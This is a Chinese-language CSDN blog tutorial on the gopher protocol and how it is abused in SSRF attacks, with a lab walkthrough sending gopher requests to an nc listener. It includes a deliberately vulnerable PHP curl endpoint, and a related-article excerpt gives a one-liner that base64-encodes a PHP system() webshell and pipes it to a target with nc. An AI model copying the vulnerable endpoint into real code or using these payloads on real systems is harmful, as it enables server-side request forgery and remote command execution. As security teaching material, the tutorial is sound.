gopher协议

最新推荐文章于 2024-05-27 14:05:23 发布
最新推荐文章于 2024-05-27 14:05:23 发布
阅读量604 收藏
点赞数
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52963334/article/details/132946099
版权

gopher协议

一、目标

  1. 什么是gopher协议
  2. 在SSRF中如何使用gopher协议反弹shell

二、定义

Gopher是Internet的一个信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议(万金油协议)。默认使用tcp70端口。

gopher在各种变成语言中的使用限制

image-20230917141615667

三、gopher协议的格式

URL:gopher://host:port/gopher-path_TCP数据流(反弹shell等命令)

注意

  • gopher的默认端口号是70
  • 如果发起post请求,回车换行需要使用%0d%0a,如果含有多个参数,连接符&也需要进行url编码
  • gopher-path后需要加一个字符,防止tcp数据流改变,默认使用下划线_

四、gopher协议发送http请求

步骤
1.构造http数据包
2.url编码、替换回车换行为%0d%0a
3.发送gopher协议

服务器端curl功能代码
<?php
//	ssrf_curl.php

if(isset($_REQUEST['url'])){
	$link = $_REQUEST['url'];
	$fileName = './curled/'.time().".txt";
	$curlObj = curl_init($link);
	$fp = fopen($fileName,'w');
	
	curl_setopt($curlObj,CURLOPT_FILE,$fp);
	curl_setopt($curlObj,CURLOPT_HEADER,0);
	curl_setopt($curlObj,CURLOPT_FOLLOWLOCATION,TRUE);
	
	curl_exec($curlObj);
	curl_close($curlObj);
	fclose($fp);
	
	if(getimagesize($fileName)){
		header("Content-Type:image/png");
	}
	
	$fp = fopen($fileName,'r');
	$result = fread($fp,filesize($fileName));
	fclose($fp);
	echo $result;
}else{
	echo "?url=[url]";
}
?>
①get请求
?url=gopher://192.168.232.173:2333/_abcd

image-20230917152658022

kali端nc响应

image-20230917152808908

②post请求
url=gopher://192.168.232.173:2333/_abcd

image-20230917152958743

kali端nc响应

image-20230917153036481

hutudamn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于gopher协议
xiaoka__的博客
11-09 1573
一、gopher协议的使用方法(注意请求开头加个_或任意字符),例如/_,不然会丢失一个字节) 使用Gopher协议发送一个请求,环境为:nc起一个监听,curl发送gopher请求 nc启动监听,监听2333端口: root@Ubuntu ~# nc -lp 2333 使用curl发送http请求,命令为 root@kali ~# curl gopher://192.168.17.129:2333/abcd 此时nc收到的消息为: root@Ubuntu ~# nc -lp 2333 bcd 可以发
Gopher协议使用总结1
08-03
1. 明尼苏达大学的吉祥物是地鼠 2. 一个跑腿的助手就像地鼠一样在地下挖洞总能到达它想要的位置 1. 如果第一个字符是 > 或者 那么丢弃该行字符串,表示
渗透系列:【防守方基础】危险报文识别+Gopher协议在SSRF漏洞中的深入研究(附视频讲解)
01-08
渗透系列:【防守方基础】危险报文识别+Gopher协议在SSRF漏洞中的深入研究(附视频讲解)
SSRF利用协议中的万金油——Gopher
qq_50854662的博客
02-23 1903
SSRF利用协议中的万金油——Gopher
Day57:WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
qq_61553520的博客
03-30 1434
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
flask-gopher:Flask扩展,支持Gopher协议
02-05
烧瓶地鼠 扩展以支持协议。 内容 演示版 在以下URL的gopherspace中提供了Flask-Gopher服务器的实时演示: gopher://mozz.us:7005 关于 什么是地鼠? Gopher是万维网的替代方案,后者在90年代初达到顶峰。 狂热者仍然维护着少数的地鼠站点。 您可以在了解有关其历史的更多信息。 什么是烧瓶球? Flask-Gopher是Flask扩展,它在内置的Web服务器周围添加了一个薄的Gopher-> HTTP兼容性层。 它允许您构建完全符合gopher服务器,并完全访问Flask的路由,模板引擎,调试器等! 这是给谁的 我创建此扩展是因为我想尝试构
Gopher协议
qq_43665434的博客
03-26 3921
Gopher协议 本文参考Margin大佬文章 什么是Gopher协议? 定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它; gopher协议支持发出GET、POST请求:可以先截获get请
SSRF深度解析Gopher协议
qq_60115503的博客
04-25 4537
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;
Hn-Gopher:有关Gopher协议的黑客新闻-C/C++开发
05-27
Hn-Gopher:有关Gopher协议的黑客新闻 | | | | | | \ | | hngopher.com:70 | | __ | | __ _ ___ | | _____ _ __ | \ | | _____ _____ | __ | / _` | / __ | | / / _ \'__ | | 。 `| / _ \ \ / \ / __ | | | | | (_ ...
064-Gopher协议使用总结.pdf
09-20
064-Gopher协议使用总结.pdf
gopher协议及ssrf
UserNick157的博客
08-24 1140
gopher curl ssrf
gopher协议总结
unexpectedthing的博客
12-01 6151
定义 gopher协议是一种信息查0找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。利用此协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求。这拓宽了 SSRF 的攻击面 利用: 攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求
一些网络协议(Gopher,PPPoE,IGMP......)
08-22 1046
  我经常上网,但可能对网络协议确不是很清楚,只知道些最经常用到的HTTP,DNS。。。不知道举些什么了:(还是把他们收集一下吧,从这些协议中可以知道互联网形成的过程。Gopher协议英文原义:The Internet Gopher Protocol中文释义:(RFC-1436)网际Gopher协议        注解:这是一种互联网没有发展起来之前的一种从远程
SSRF攻击与Gopher协议
RuiLike的博客
06-04 1221
Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher支持发出GET、POST请求。
Gopher协议漏洞
火柴人的博客
09-08 273
https://damit5.com/2018/05/26/SSRF-%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/ https://blog.chaitin.cn/gopher-attack-surfaces/
【网络安全 | HTTP】 gopher协议原理、语法及利用总结
等风来
08-01 8317
Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。与HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。
各种协议
只作为个人备忘录
09-28 579
在Windows系统下,网络属性里面可以看到的,常用的网络协议主要有: 一:NETBEUI 二:IPX/SPX 三:TCP/IP 后台你看不到的,不同的”层“,有不同的协议,简单描述如下: 应用层· DHCP(动态主机分配协议)·  DNS (域名解析)·  FTP(File Transfer Protocol)文件传输协议·  Gopher (英文原义:The Inte
华纳云:在一个服务器上如何设置多个IP地址?
最新发布
YOKEhn的博客
05-27 345
在Windows上,可以通过网络连接的高级TCP/IP设置或使用netsh命令添加多个IP地址。在一个服务器上设置多个IP地址的具体步骤取决于所使用的操作系统(例如Linux或Windows)。你也可以使用ip命令临时配置多个IP地址,这在需要立即生效但不重启网络服务的情况下非常有用。在“IP 设置”标签下,点击“添加”按钮,输入新的IP地址和子网掩码,然后点击“添加”。选择“Internet 协议版本 4 (TCP/IPv4)”,然后点击“属性”。右键点击要配置的网络适配器,选择“属性”。
使用gopher协议写webshell
06-06
Gopher 协议是一个老式的网络协议,它主要用于文本传输和文件下载。由于一些历史原因,Gopher 协议在一些场景下仍然有用处,例如绕过一些防火墙和安全设备。在某些情况下,可以利用 Gopher 协议来写 Webshell,从而实现远程命令执行和文件上传等功能。 下面是一个简单的 Gopher Webshell 例子: 1. 创建一个 PHP 脚本,将其编码为 base64 格式,假设文件名为 `shell.php`。 2. 将编码后的 PHP 脚本内容插入到 Gopher URL 中,形如 `gopher://hostname:port/_<base64-encoded-php-script>`。 3. 在浏览器或者 curl 等工具中访问该 Gopher URL,即可触发 PHP 脚本执行,从而实现远程命令执行和文件上传等功能。 例如,可以使用以下命令在 Linux 系统上写入一个 Gopher Webshell: ``` echo '<?php system($_GET["cmd"]) ?>' | base64 | xargs printf "GET /_%s HTTP/1.0\r\n\r\n" | nc hostname port ``` 其中,`hostname` 和 `port` 分别为目标主机和端口号,`cmd` 为远程命令执行参数。此时,访问 `gopher://hostname:port` 即可执行远程命令。 需要注意的是,使用 Gopher 协议写 Webshell 存在一些风险,容易被防火墙和安全设备识别和拦截。此外,由于 Gopher 协议已经过时,一些浏览器和工具可能不支持 Gopher URL。因此,在实际应用中,需要根据具体情况进行选择和调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值